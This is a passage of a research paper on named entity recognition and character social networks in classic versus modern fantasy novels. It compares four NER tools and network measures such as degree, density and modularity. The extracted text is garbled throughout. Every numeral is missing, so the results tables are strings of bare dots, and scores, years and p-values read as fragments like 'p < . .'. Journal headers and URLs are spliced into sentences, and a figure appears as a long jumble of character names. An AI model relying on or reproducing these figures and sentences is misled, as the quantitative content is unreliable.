evaluations. to answer the second research question, we use the recognised named entities to create a co-occurrence network for each novel. network analysis measures are then employed to compare the extracted networks from the classic and modern novels to investigate whether the networks from the different sets of novels exhibit major differences. the contributions of this paper are: ( ) a comparison and an analysis of four ner on classic and modern novels; ( ) a comparison and an analysis of social network analysis measures on networks automatically extracted from classic and modern novels; ( ) experiments and recommendations for boosting performance on recognising entities in novels; and ( ) an annotated gold standard dataset with entities and coreferences of classic and modern novels. the remainder of this paper is organised as follows. we first discuss related work in the section ‘related work’. next, we describe our approach and methods in the section ‘materials and data preparation’. we present our evaluation of four different ner systems on classic and modern novels in the section ‘named entity recognition experiments and results’, followed by the creation and analysis of social networks in the section ‘network analysis’. we discuss issues that we encountered in the identification of fictional characters and showcase some methods to boost performance in the section ‘discussion and performance boosting options’. we conclude by suggesting directions for future work in the section ‘conclusion and future work’. the code for all experiments as well as annotated data can be found at https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel. related work as mentioned in the section ‘introduction’, we have not found any other studies that compared the performances of social network extraction on classic and modern novels; or compared the structures of these networks. this section therefore focuses on the techniques used on classic literature. in first part of this section, we will describe how other studies extract and cluster characters. in the second part, we outline what different choices can be made for the creation of a network, and motivate our choices for this study. a gazetteer is a list of names dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dbamman/book-nlp https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ named entity recognition the first and foremost challenge in creating a social network of literary characters is identifying the characters. ner is often used to identify passages in text that identify things by a name. furthermore, identified passages are often also classified into various categories such as person, location, and organisation. typically, this approach is also used to identify miscellaneous numerical mentions such as dates, times, monetary values, and percentages. elson, dames & mckeown ( ), ardanuy & sporleder ( ), bamman, underwood & smith ( ), and vala et al. ( ) all use the stanford ner tagger (finkel, grenager & manning, ) to identify characters in literary fiction. on a collection of sherlock holmes novels, these studies perform named entity recognition, f -scores between: and . vala et al. ( ) propose that the main difficulty with this collection is the multitude of minor characters, a problem which we expect to be also present in our collections of classic and modern novels. a big difference between the news domain (for which most language technology tools have been created) and the literary domain, is that names do not have to follow the same ‘rules’ as names in the real world. this topic is explored in the namescape project by de does et al. ( ) namescape (http://blog.namescape.nl/). in this project, one million tokens taken from dutch novels were manually annotated. a distinction between first and last names was made in order to test whether different name parts are used with different effects. a named entity recogniser was trained specifically for this corpus by namescape-clin, obtaining an f score of . for persons. the corpus contains fragments of novels written between the th and th century, but as the corpus and tools are not available, we cannot investigate its depth or compare it directly to our work. other approaches attempt to use the identification of locations and physical proximity to improve the creation of a social network (lee & yeung, ). coreference resolution one difficulty of character detection is the variety of aliases one character might go by, or; coreference resolution. for example, george martin’s tyrion lannister, might alternatively be mentioned as ser tyrion lannister, lord tyrion, tyrion, the imp or the halfman. in the vast majority of cases, it is desirable to collapse those character references into one character entity. however, in some cases, retaining some distinction between character references can be useful: we provide an example of this in subsection ‘network exploration’. two distinct approaches attempt to address this difficulty, ( ) omit parts of a multi- word name, or ( ) compile a list of aliases. the former approach leaves out honorifics such as the ser and lord in the above example in order to cluster the names of one character. to automate this clustering step, some work has been done by bamman, underwood & smith ( ) and ardanuy & sporleder ( ). while useful, the former approach alone provides no solace for the matching of the last two example aliases; where no part of the character’s name is present. the latter approach thus suggests to manually compile a list of aliases for each character with the aid of external resources or annotators. this method is utilised by elson, dames & mckeown ( ) and dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://blog.namescape.nl/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee & yeung ( ). in namescape-clin, wikification (i.e. attempting to match recognised names to wikipedia resources) is used. obviously this is most useful for characters that are famous enough to have a wikipedia page. the authors state in their error analysis van dalen-oskam et al. ( , section . ) that titles that are most likely from the fantasy domain are most difficult to resolve, which already hints at some differences between names in different genres. anaphora resolution to identify as many character references as possible, it is important to take into account that not all references to a character actually mention the character’s name. in fact, bamman, underwood & smith ( ) show that % of character references come in the form of a pronouns such as he, him, his, she, her, and hers in a collection of , english novels. to capture these references, the anaphoric pronoun is typically matched to its antecedent by using the linear word distance between the two, and by matching the gender of anaphora to that of the antecedent. the linear word distance can be, for example, the number of words between the pronoun and the nearest characters. for unusual names, as often found in science fiction and fantasy, identification of the gender may be problematic. network creation for a social network of literary characters, characters are represented by the nodes, whereas the edges indicate to some interaction or relationship. while the definition of a character is uniformly accepted in the literature, the definition of an interaction varies per approach. in previous research, two main approaches can be identified to define such an edge. on the one hand, conversational networks are used in approaches by chambers & jurafsky ( ), elson & mckeown ( ), and he, barbosa & kondrak ( ). this approach focuses on the identification of speakers and listeners, and connecting each speaker and listener to the quoted piece of dialogue they utter or receive. on the other hand, co-occurrence networks (as used by ardanuy & sporleder ( ) and fernandez, peterson & ulmer ( )) are created by connecting characters if they occur in the same body of text. while conversational networks can provide a good view of who speaks directly to whom, ardanuy & sporleder ( ) argue that ‘...much of the interaction in novels is done off-dialogue through the description of the narrator or indirect interactions’ (p. ). what value to assign to the edges depends on the end-goal of the study. for example, fernandez, peterson & ulmer ( ) assign a negative or positive sentiment score to the edges between each character-pair in order to ultimately predict the protagonist and antagonist of the text. ardanuy & sporleder ( ) used weighted edges to indicate how often two characters interact. network analysis social network analysis draws upon network theory for its network analysis measures (scott, ). the application of these measures to networks extracted from literature has been demonstrated insightful in assessing the relationships of characters in for example dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ‘alice in wonderland’ (agarwal et al., ) and ‘beowulf’, the ‘iliad’ and ‘táin bó cuailnge’ (‘the cattle raid of cooley’, an irish epic) (mac carron & kenna, ). network analysis can also play a role in authorship attribution (amancio, , akimushkin, amancio & oliveira, ) and characterising a novel (elson, dames & mckeown, ). materials and data preparation for the study presented here, we are interested in the recognition and identification of persons mentioned in classic and modern novels for the construction of the social network of these fictitious characters. we use off-the-shelf state-of-the-art entity recognition tools in an automatic pipeline without manually created alias lists or similar techniques. for the network construction, we follow ardanuy & sporleder ( ) and apply their co-occurrence approach for the generation of the social network links with weighted edges that indicate how often two characters are mentioned together. we leave the consideration of negative weights and sentiments for future work. before we will explain the details of the used entity recognition tools, how they compare for the given task, and how their results can be used to build and analyse the respective social networks, we explain first the details of our selected corpus, how we preprocessed the data, and how we collected the annotations for the evaluation. corpus selection our dataset consists of novels— classic and modern novels—the specifics of which are presented in table a in the appendix. any selection of sources is bound to be unrepresentative in terms of some characteristics but we have attempted to balance breadth and depth in our dataset. furthermore, we have based ourselves on selections made by other researchers for the classics and compilations by others for the modern books. for the classic set, the selection was based on guardian’s top all-time classic novels (mccrum, ). wherever possible, we selected books that were ( ) analysed in related work (as mentioned in the subsection ‘coreference resolution’) and ( ) available through project gutenberg (https://www.gutenberg.org/). for the modern set, the books were selected by reference to a list compiled by bestfantasybookscom (http://bestfantasybooks.com/top -fantasy-books.php, last retrieved: october ). for our final selection of these novels, we deliberately made some adjustments to get a wider selection. that is, some of the books in this list are part of a series. if we were to include all the books of the upvoted series, our list would consist of only four different series. we therefore chose to include only the first book of each of such series. as the newer books are unavailable on gutenberg, these were purchased online. these digital texts are generally provided in .epub or .mobi format. in order to reliably convert these files into plain text format, we used calibre (https://calibre-ebook.com/—version . ), a free and open-source e-book conversion tool. this conversion was mostly without any hurdles, but some issues were encountered in terms of encoding, as is discussed in the next section. due to copyright restrictions, we cannot share this full dataset but our gold standard dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.gutenberg.org/ http://bestfantasybooks.com/top -fantasy-books.php https://calibre-ebook.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ annotations of the first chapter of each are provided on this project’s github page. the isbn numbers of the editions used in our study can be found in table a the appendix. data preprocessing to ensure that all the harvested text files were ready for processing, we firstly ensured that the encoding for all the documents was the same, in order to avoid issues down the line. in addition, all information that is not directly relevant to the story of the novel was stripped. even while peripheral information in some books—such as appendices or glossaries—can provide useful information about character relationships, we decided to focus on the story content and thus discard this information. where applicable, the following peripheral information was manually removed: ( ) reviews by fellow writers, ( ) dedications or acknowledgements, ( ) publishing information, ( ) table of contents, ( ) chapter headings and page numbers, and ( ) appendices and/or glossaries. during this clean-up phase, we encountered some encoding issues that came with the conversion to plain text files. especially in the modern novels, some novels used inconsistent or odd quotation marks. this issue was addressed by replacing the inconsistent quotation marks with neutral quotations that are identical in form, regardless of whether if it is used as opening or closing quotation mark. annotation because of limitations in time and scope, we only annotated approximately one chapter of each novel. in this subsection, we describe the annotation process. annotation data to evaluate the performance for each novel, a gold standard was created manually. two annotators (not the authors of this article) were asked to evaluate books from each category. for each document, approximately one chapter was annotated with entity co-occurrences. because the length of the first chapter fluctuated between and , sentences, we selected an average of sentences for each book that was close to a chapter-boundary. for example, for alice in wonderland, the third chapter ended on the th sentence, so the first three chapters were extracted for annotation. while not perfect, we attempted to strike a balance between comparable annotation lengths for each book, without cutting off mid-chapter. annotation instructions for each document, the annotators were asked to annotate each sentence for the occurrence of characters. that is, for each sentence, identify all the characters in it. to describe this process, an example containing a single sentence from a game of thrones is included in table . the id of the sentence is later used to match the annotated sentence to table annotation example. id preceding context focus sentence subsequent context # person person bran reached out hesitantly ‘go on’, robb told him ‘you can touch him’ robb stark bran stark dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ its system-generated counterpart for performance evaluation. the focus sentence is the sentence that corresponds to this id, and is the sentence for which the annotator is supposed to identify all characters. as context, the annotators are provided with the preceding and subsequent sentences. in this example, the contextual sentences could be used to resolve the ‘him’ in the focus sentence to ‘bran’. to indicate how many persons are present, the annotators were asked to fill in the corresponding number (#) of people—with a maximum of characters per sentence. depending on this number of people identified, subsequent fields became available to the annotator to fill in the character names. to speed up the annotation, an initial list of characters was created by applying the booknlp pipeline to each novel. the annotators were instructed to map the characters in the text to the provided list to the best of their ability. if the annotator assessed that a person appears in a sentence, but is unsure of this character’s identity, the annotators would mark this character as default. in addition, the annotators were encouraged to add characters, should they be certain that this character does not appear in the pre-compiled list, but occurs in the text nonetheless. such characters were given a specific tag to ensure that we could retrieve them later for analysis. lastly, if the annotator is under the impression that two characters in the list refer to the same person, the annotators were instructed to pick one and stick to that. lastly, the annotators were provided with the peripheral annotation instructions found in table . while this identification process did include anaphora resolution of singular pronouns— such as resolving ‘him’ to ‘bran’—the annotators were instructed to ignore plural pronoun references. plural pronoun resolution remains a difficult topic in the creation of social networks, as family members may sometimes be mentioned individually, and sometimes their family as a whole. identifying group membership, and modelling that in the social network structure is not covered by any of the tools we include in our analysis or the related work referenced in the section ‘related work’ and therefore left to future work. named entity recognition experiments and results we evaluate the performance of four different ner systems on the annotated novels: booknlp (bamman, underwood & smith, ), stanford ner (finkel, grenager & manning, ), illinois tagger (ratinov & roth, ), and ixa-pipe-nerc (agerri & rigau, ). the booknlp pipeline uses the - - release of stanford ner tagger (finkel, grenager & manning, ) internally with the seven-class ontonotes model. table annotation instructions. guideline example ignore generic pronouns ‘everyone knows; you don’t mess with me!’ ignore exclamations ‘for christ’s sake!’ ignore generic noun phrases ‘bilbo didn’t know what to tell the wizard’ include non-human named characters ‘his name is buckbeak, he’s a hippogriph’ note: boldface indicates an entity mention. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as there have been several releases, and we focus on entities of type person, we also evaluate the - - stanford ner four-class conll model. the results of the different ner systems are presented in table for the classic novels, and table for the modern novels. all results are computed using the evaluation script used in the conll and ner campaigns using the phrase-based evaluation setup (https://www.clips.uantwerpen.be/conll /ner/bin/conlleval.txt, last retrieved: october ). the systems are evaluated according to micro-averaged precision, recall and f measure. precision is the percentage of named entities found by the system that were correct. recall is the percentage of named entities present in the text that are retrieved by the system. the f measure is the harmonic mean of the precision and recall scores. in a phrase-based evaluation setup, the system only scores a point if the complete entity is correctly identified, thus if in a named entity consisting of multiple tokens only two out of three tokens are correctly identified, the system does not obtain any points. the booknlp and ixa-pipe-nerc systems require that part of speech tagging is performed prior to ner, we use the modules included in the respective systems table precision (p), recall (r), and f -scores of different ner systems on classic novels. title booknlp stanford ner illinois ner ixa-nerc p r f p r f p r f p r f . . . . . . . . . . . . a study in scarlet⊙ . . . . . . . . . . . . alice in wonderland . . . . . . . . . . . . brave new world . . . . . . . . . . . . david copperfield⊙ . . . . . . . . . . . . dracula⊙ . . . . . . . . . . . . emma . . . . . . . . . . . . frankenstein⊙ . . . . . . . . . . . . huckleberry finn . . . . . . . . . . . . dr. jekyll and mr. hyde . . . . . . . . . . . . moby dick⊙ . . . . . . . . . . . . oliver twist . . . . . . . . . . . . pride and prejudice . . . . . . . . . . . . the call of the wild . . . . . . . . . . . . the count of monte cristo . . . . . . . . . . . . the fellowship of the ring . . . . . . . . . . . . the three musketeers . . . . . . . . . . . . the way we live now . . . . . . . . . . . . ulysses . . . . . . . . . . . . vanity fair . . . . . . . . . . . . mean m . . . . . . . . . . . . standard deviation s . . . . . . . . . . . . note: the highest scores in each column are highlighted in bold, and the lowest scores in italics. novels written in st person are marked with ⊙. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.clips.uantwerpen.be/conll /ner/bin/conlleval.txt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for this. for stanford ner and illinois ne tagger plain text is offered to the ner systems. as the standard deviations on the bottom rows of tables and indicate, the results on the different books vary greatly. however, the different ner systems generally do perform similarly on the same novels, indicating that difficulties in recognising named entities in particular books is a characteristic of the novels rather than the systems. an exception is brave new world on which booknlp performs quite well, but the others underperform. upon inspection, we find that the annotated chapter of this book contains only five different characters among which ‘the director’ which occurs times. this entity is consistently missed by the systems resulting in a high penalty. furthermore, the ‘mr.’ in ‘mr. foster’ (occurring times) is often not recognised as in some ne models titles are excluded. a token-based evaluation of illinois ne tagger on this novel for example yields a f -score of . . the same issue is at hand with dr. jekyll and mr. hyde and dracula. although the main ner module in booknlp is driven by stanford ner, we suspect that additional domain adaptations in this package account for this performance difference. table precision (p), recall (r), and f scores of different ner systems on modern novels. title booknlp stanford ner illinois ner ixa-nerc p r f p r f p r f p r f a game of thrones . . . . . . . . . . . . assassin’s apprentice⊙ . . . . . . . . . . . . elantris . . . . . . . . . . . . gardens of the moon . . . . . . . . . . . . harry potter . . . . . . . . . . . . magician . . . . . . . . . . . . mistborn . . . . . . . . . . . . prince of thorns . . . . . . . . . . . . storm front⊙ . . . . . . . . . . . . the black company⊙ . . . . . . . . . . . . the black prism . . . . . . . . . . . . the blade itself . . . . . . . . . . . . the colour of magic . . . . . . . . . . . . the gunslinger . . . . . . . . . . . . the lies of locke lamora . . . . . . . . . . . . the name of the wind . . . . . . . . . . . . the painted man . . . . . . . . . . . . the way of kings . . . . . . . . . . . . the wheel of time . . . . . . . . . . . . way of shadows . . . . . . . . . . . . mean m . . . . . . . . . . . . standard deviation s . . . . . . . . . . . . note: the highest scores in each column are highlighted in bold, and the lowest scores in italics. novels written in st person are marked with ⊙. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ when comparing the f -scores of the st person novels to the rd person novels in tables and , we find that the st person novels perform significantly worse than their rd person counterparts, at p < . . these findings are in line with the findings of elson, dames & mckeown ( ). in the section ‘discussion and performance boosting options’, we delve further into particular difficulties that fiction presents ner with and showcase solutions that do not require retraining the entity models. as the booknlp pipeline in the majority of the cases outperforms the other systems and includes coreference resolution and character clustering, we further utilise this system to create our networks. the results of the booknlp pipeline including the coreference and clustering are presented in table a . one of the main differences in that table is that if popular entities are not recognised by the system they are penalised heavier because the coreferent mentions are also not recognised and linked to the correct entities. this results in scores that are generally somewhat lower, but the task that is measured is also more complex. network analysis in this section, we explain how the networks were created using the recognised named entities (subsection ‘network construction’), followed by an explanation of network analysis measures that we applied to compare the networks (subsection ‘network features’). we discuss the results of the analysis (subsection ‘results of network analysis’), as well as present an exploration of the network of one novel in particular to illustrate how a visualisation of a network can highlight particular characteristics of the interactions in the selected novel (subsection ‘network exploration’). network construction as explained in the section ‘related work’, we opt for the co-occurrence rather than the conversational method for finding the edges of our networks. the body of text that is used to define a co-occurrence differs per approach. whereas fernandez, peterson & ulmer ( ) define such a relation if characters are mentioned in the same sentence, ardanuy & sporleder ( ) use a paragraph for the same definition. we consider the delineation of what constitutes a paragraph to be too vague for the purpose of this study. while paragraphs are arguably better at conveying who interacts with whom, simply because of their increased length, it also brings forth an extra complexity in terms of their definition. traditionally, paragraphs would be separated from another by means of a newline followed by an indented first line of the next paragraph. while this format holds for a part of our collection, it is not uniform. other paragraph formats simply add vertical white space, or depend solely on the content (bringhurst, ). especially because the text files in our approach originate from different online sources— each with their own accepted format—we decided that the added ambiguity should be avoided. for this study, we therefore define that a co-occurrence relationship between two characters exists if they are mentioned in the same sentence. for a co-occurrence of more than two characters, we follow elson, dames & mckeown ( ). dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that is, a multi-way co-occurrence between four characters is broken down into six bilateral co-occurrences. for the construction of each social network, the co-occurrences are translated to nodes for characters and edges for relationships between the characters. we thus create a static, undirected and weighted graph. for the weight of each edge, we follow ardanuy & sporleder ( ). that is, each edge is assigned a weight depending on the number of interactions between two characters. for the construction of the network, we used networkx (https://networkx.github.io/—v . ) and gephi (https://gephi.org/—v . . ) to visualise the networks. to ground the network analysis to be presented below, we gathered some overall statistics of the network creation process shown in table a on page . as mentioned in the subsection ‘annotation’, if the annotator decided that a character was definitely present, but unable to assert which character, the occurrence was marked as default. the fraction of defaults represents what portion of all identified characters was marked with default. the fraction of unidentified characters represents the percentage of characters that were not retrieved by the system, but had to be added by the annotators. next, we present some overall statistics such as sentence length, the average number of persons in a sentence, and the average fraction of sentences that mention a person. lastly, we kept track of the total number of annotated sentences, the total number of unique characters and character mentions. the only difference that could be identified between classes is the average sentence length, which was significant at p < . . the sentences in classic books are significantly longer than in modern novels, suggesting that there is indeed some difference in writing style. however, other than that, none of the other measures differ significantly. this is useful information, as it helps support that the novels used in either class are comparable, despite their age-gap. network features we analyse the following eight network features: ( ) average degree is the mean degree of all the nodes in the network. the degree of a node is defined as the number of other nodes the node is connected to. if the degree of a node is zero, the node is connected to no other nodes. the degree of a node in a social network is thus is measure of its social ‘activity’ (wasserman & faust, ). a high value—for example, in ulysses—indicates that the characters interact with many different other characters. contrarily, a low value—for example, in —indicates that the characters only interact with a small number of other characters. ( ) average weighted degree is fairly similar to the average degree, but especially in the sense of social networks, a distinction must be made. it differs in the sense that the weighted degree takes into account the weight of each of the connecting edges. whereas a character in our social network could have a high degree—indicating a high level of social activity—if the weights of all those connected edges are relatively small, this suggests only superficial contact. conversely, while the degree of a character could be low—for example, the character is only connected to two other characters— the two edges could have very large weights, indicating a deep social connection dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://networkx.github.io/ https://gephi.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between the characters. newman ( ) underlines the importance of this distinction in his work on scientific collaborations. to continue the examples of ulysses and ; while their average degrees are vastly different (with ulysses being the highest of its class and the lowest), their average weighted degrees are comparable. ( ) average path length is the mean of all the possible shortest paths between each node in the network; also known as the geodesic distance. if there is no path connecting two nodes, this distance is infinite and the two nodes are part of different graph components (see item , connected components). the shortest path between two nodes can be found by using dijkstra’s algorithm (dijkstra, ). the path length is typically an indication of how efficiently information is relayed through the network. a network with a low path length would indicate that the people in the network can reach each other through a relatively small number of steps. ( ) network diameter is the longest possible distance between two nodes in the network. it is in essence the longest, shortest path that can be found between any two nodes in the network, and is indicative of the linear size of the network (wasserman & faust, ). ( ) graph density is the fraction of edges compared to the total number of possible edges. it thus indicates how complete the network is, where completeness would constitute all nodes being directly connected by an edge. this is often used in social network analysis to represent how closely the participants of the network are connected (scott, ). ( ) modularity is used to represent community structure. the modularity of a network is ‘...the number of edges falling within groups minus the expected number in an equivalent network with edges placed at random’ (newman, ). newman shows modularity can be used as an optimisation metric to approximate the number of community structures found in the network. to identify the community structures, we used the louvain algorithm (blondel et al., ). the identification of community structures in graph is useful, because the nodes in the same community are more likely to have other properties in common (danon et al., ). it would therefore be interesting to see if differences can be observed between the prevalence of communities between the classic and modern novels. ( ) connected components are the number of distinct graph compartments. that is, a graph component is a subgraph in which any two vertices are connected to each other by paths, and which is connected to no additional vertices in the supergraph. in other words, it is not possible to traverse from one component to another. in most social communities, one ‘giant component’ can typically be identified, which contains the majority of all vertices (kumar, novak & tomkins, ). a higher number of connected components would indicate a higher number of isolated communities. this is different from modularity in the sense that components are more strict. if only a single edge goes out from a subgraph to the supergraph, it is no longer considered a separate component. modularity attempts to identify those communities that are basically ‘almost’ separate components. ( ) average clustering coefficient is the mean of all clustering coefficients. the clustering coefficient of a node can perhaps best be described as ‘all-my-neighbours-know-each-other’. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ social networks with a high clustering coefficient (and low average path length) may exhibit small world (https://en.wikipedia.org/wiki/smallworld_experiment) properties (watts & strogatz, ). the small world phenomenon was originally described by stanley milgram in his perennial work on social networks (travers & milgram, ). results of network analysis to answer our second research question, we compared the network features presented in the subsection ‘network features’ for the social networks of the two different sets of novels. table a on page shows the results. the most striking feature of these results is the wide variance across social networks on all these network measures for both the classic and the modern novels. the size of these network ranges from just nodes to networks more than times as large. the network size alone can also explain at least a large part of the differences in graph density, diameter, and average path length, but also average degree and clustering coefficient show wide variation. while we can observe large variation overall, there is no clear difference between the two classes, that is, between classic and modern novels. none of the evaluated network features differ significantly between these classes. graph density is the feature that comes closest to being significant (p = . ), with our classic novels on average exhibiting denser networks than the modern ones. in order to better interpret these values, and in order to find out whether this variance in network features is by itself a characteristic property of social networks exposed in novels, or whether this is true for social networks in general, we need a point for comparison. for that purpose, we compare our network results to metrics that have been reported for other social network in the literature. table shows such networks for comparison, including three small networks on karate club members, football players, and email users (telesford et al., ), three medium-sized networks of mathematicians, a larger group of email users, and actors (boccaletti et al., ), and four large networks of online platforms (mislove et al., ). we can see that social networks reported elsewhere exhibit a wide variation as well, showing (unsurprisingly) an even much wider range for the network size, with the reported online social networks reaching millions of nodes. our networks from novels are on the lower end of the size range, with the smallest ones being smaller than the smallest network of our comparison set (karate). this directly explains why the path lengths are also on the lower end of the range, but with a considerable overlap. with respect to the average degree, our novel networks are covered by the range given by these comparison networks, with even the outliers of our dataset being less extreme than the most extreme cases of the comparison networks. the same holds for the clustering coefficient, except for the outlier for a very small network with a clustering coefficient of (alice in wonderland). in summary, we can say that social networks from novels appear to be no different than social networks in general in showing a high variation in basically all network features across different networks. while networks differ much individually, there is no significant fundamental difference between classic and modern novels. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://en.wikipedia.org/wiki/smallworld_experiment http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network exploration in addition to the formal analysis above, we show here a more informal exploration of one of the networks in order to give a more intuitive explanation of our results. for that purpose, we selected the largest network of the modern novels, which is a game of thrones. a visualisation of that network is shown in fig. . we see that it is a quite dense network with many connections (it has the highest average degree of all modern novels; see table a ) and a complex structure. despite this complexity, the relationship between the main characters of this novel can easily be identified from this visualisation, and one can clearly identify social clusters. such informal visual explorations should then of course be substantiated with formal analyses, that is, by ranking the edges of the network by their weights and by applying a clustering algorithm in the case of the two given examples. as the readers of this novel might have already spotted, dany resides in a completely different part of the world in this novel, which explains her distance from rest of the network. moreover, in a game of thrones, this character does not at any point physically interact with any of the characters in the larger cluster. this highlights a caveat of the use of co-occurrence networks over conversational networks. the character dany does not truly interact with the characters of this main cluster, but is rather name- dropped in conversations between characters in that cluster. her character ‘co-occurs’ with the characters that drop her name and edges are created to represent that. to stick with the example of dany, we can also identify two seemingly separate characters, dany and daenerys targaryen in fig. . these names actually refer to the same entity. as mentioned in the section ‘related work’, this issue may be addressed by creating table comparison to other social networks. network via nodes average degree clustering coefficient average path length karate telesford et al. ( ) † . . . † football telesford et al. ( ) . . . e-mail telesford et al. ( ) , . . . math boccaletti et al. ( ) , . . . ⋄ e-mail boccaletti et al. ( ) , . . † . actors boccaletti et al. ( ) , . ⋄ . ⋄ . youtube mislove et al. ( ) , , . . . flickr mislove et al. ( ) , , . . . orkut mislove et al. ( ) , , . † . . livejournal mislove et al. ( ) , , ⋄ . . . maximum . . . classic novels mean . . . minimum . . . maximum . . . modern novels mean . . . minimum . . . notes: the highest scores in each column are highlighted with a ⋄ and the lowest scores with a † for the comparison networks. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a list of aliases for each character. some online sources exist that can help expedite this process, but we would argue these sources are not applicable to our modern novels. whereas th century novels typically have characters with more traditional names such as elizabeth bennet, modern fantasy novels have unconventional names such as daenerys targaryan. external sources such as on metacpan can help to connect elizabeth to nicknames such as lizzy, but there are no sources that can do this for daenerys and dany. even if there was such a source, the question remains whether if it is desirable to collapse those characters. especially in a game of thrones, the mentions of dany and daenerys targaryen occur in entirely different contexts. whereas references to dany occur in an environment that is largely friendly towards her; her formal name of daenerys targaryen is mostly used by her enemies (in her absence). rather than simply collapsing the two characters as one, it might be useful to be able to retain that distinction. this is a design choice that will depend on the type of research question one wants to answer by analysing the social networks. discussion and performance boosting options in analysing the output of the different ner systems, we found that some types of characters were particularly difficult to recognise. firstly, we found a number of joseth harys ser lord robb cohollo piper ser marq hullen tommen prince trant meryn ser lord vance dareon arya horseface lord hornwood robert baratheon caron lord bryce elia stark sansa mott master aggo thoros lyanna ser donnel nymeria sherrer tarly sam jhiqui alyssa arryn jyck yoren frey lady rayder mance pyp manderly ser wylis chella jhogo chiggen dontos ser bronze yohn royce chett visenya cassel jory grenn lord slynt hal mollen ned stark stark brandon mikken greyjoy balon morrec tomard danwell mya stone heartsbane jaremy ser rykker egen ser vardis castle black lord dondarrion beric brynden blackfish maester luwin maester aemon craven mord matt clegane sandor shae harrenhal lord nestor royce pentoshi toad porther lord lord tyrion mago vargo hoat rickon eroeh lord arryn quaro lord piper braavosi matthar bracken jonos lord lord steward manderly ser wendel tregar timett santagar ser aron barristan selmy ser payne ser ilyn perwyn ser lord mallister jason samwell tarly poole vayon jofftey beth gared moreo whent oswell ser forel syrio dany kurleket greatjon lannister tyrion ser moore mandon hardin dorne lord jon stannis baratheon lord jeren ulf moat cailin cassel martyn alliser ser thorne farlen lord robert lys lord rowan jeyne poole tyroshi conn maegor haggo vale edmure ser tully highgarden gage hill horn coratt maege mormont lady catelyn stark cayn ben stark marillion lady mormont king robert arryn gendry xho jalabhar khaleesi lord baratheon renly alyn lord baelish petyr lady sansa mirri maz duur lord frey walder father ser addam marbrand hugh ser old nan lharys jacks rhaegar targaryen joffrey prince boros ser blount vance karyl joff mordane septa ser tallhart helman lord tytos blackwood tywin lord lannister yi ti jen ben halder shagga arryn jon dolf baelor gunthor lannister ser kevan stevron frey ser tanda lady raymun darry ser shaggydog lord tully hoster arys ser flowers jafer willis ser wode dawn heward willem darry fogo malleon will rhaggat khal mycah jaggot flement brax ser umar robar ser naerys cheyk tobho mott benjen stark mohor littlefinger lord tyrell brynden ser tully hali myrcella stiv othell yarwyck greyjoy theon irri maester pycelle grey wind quorin halfhand jaehaerys lord cerwyn clydas rakharo dywen magister illyrio torrhen aegon targaryen bowen marsh daryn hornwood riverrun clegane gregor ser snow jon rast aerys targaryen drogo khal viserys targaryen qotho whent lady hobb three-finger dothraki royce ser andar karyl ser hake lance hosteen mace tyrell lord hunter hallis mollen dothrak vaes daeren targaryen lord lefford volantis glover galbart rhaego bolton roose catelyn tully lannister cersei joss waymar ser royce lothor brune lord tarly randyll derik lord jared frey ser tyrosh ser swann balon lord varys bran harrion karstark jhaqo doreah haider bush janos slynt brothers moon arya stark daenerys targaryen corbray lyn ser hodor robett glover harwin arbor lord karstark rickard bronn hobber ser khal jommo horas ser lord mormont desmond starks robb stark lord hand lord albett noye donal jorah ser mormont figure social network of g.r.r. martin’s a game of thrones. full-size doi: . /peerj-cs. /fig- metacpan is a search engine for perl code and documentation: https:// metacpan.org/source/brianl/lingua- en-nickname- . /nicknames.txt (last retrieved: october ). dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://metacpan.org/source/brianl/lingua-en-nickname- . /nicknames.txt https://metacpan.org/source/brianl/lingua-en-nickname- . /nicknames.txt https://metacpan.org/source/brianl/lingua-en-nickname- . /nicknames.txt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unidentified names that are so called word names (i.e. terms that also occur in dictionaries, for example to denote nouns such as grace or rebel). we suspected that this might hinder the ner, which is why we collected all such names in our corpus in table a on page , and highlighted such word names with a †. this table shows that approximately % of all unidentified names in our entire corpus consist at least partially of a word name, which underpins that this issue is potentially widely spread. in order to verify this, we replaced all potentially problematic names in the source material by generic english names. we made sure not to add names that were already assigned to other characters in the novel, and we ensured that these names were not also regular nouns. an example of these changed character names can be found in table , which shows all names affected for the black company. secondly, we noticed that persons with special characters in their names can prove difficult to retrieve. for example, names such as d’artagnan in the three musketeers or shai’tan in the wheel of time were hard to recognise for the systems. to test this, we replaced all names in our corpus such as d’artagnan or shai’tan with dartagnan and shaitan. by applying these transformations to our corpus, we found that the performances could be improved, uncovering some of the issues that plague ner. as can be observed in fig. , not all of the novels were affected by these transformations. out of the novels used in this study, we were able to improve the performance for . while the issue of the apostrophed affix was not as recurrent in our corpus as the real-word names, its impact on performance is troublesome nonetheless. clearly, two novels are more affected by these transformations than the others, namely: the black company and the the three musketeers. to further sketch these issues, we delve a bit deeper into these two 